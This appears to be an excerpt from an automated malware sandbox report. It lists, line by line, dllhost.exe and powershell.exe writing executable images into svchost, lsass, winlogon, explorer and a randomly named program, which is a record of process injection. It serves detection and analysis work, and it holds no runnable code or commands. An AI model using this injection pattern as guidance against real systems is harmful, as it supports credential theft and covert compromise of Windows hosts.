Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 204616A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F119790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 166BBF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 115765F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17E36BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 204616A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F119790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 166BBF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 242A6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 242A7150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1DEE3460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1BF02230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A607DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A621FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F96B9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F96B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1FD93340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2F9800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 187E4760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2FBA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 8850000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 8850000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7228Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7992
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3268Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 83F0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: D6D5A21010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26CDA140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
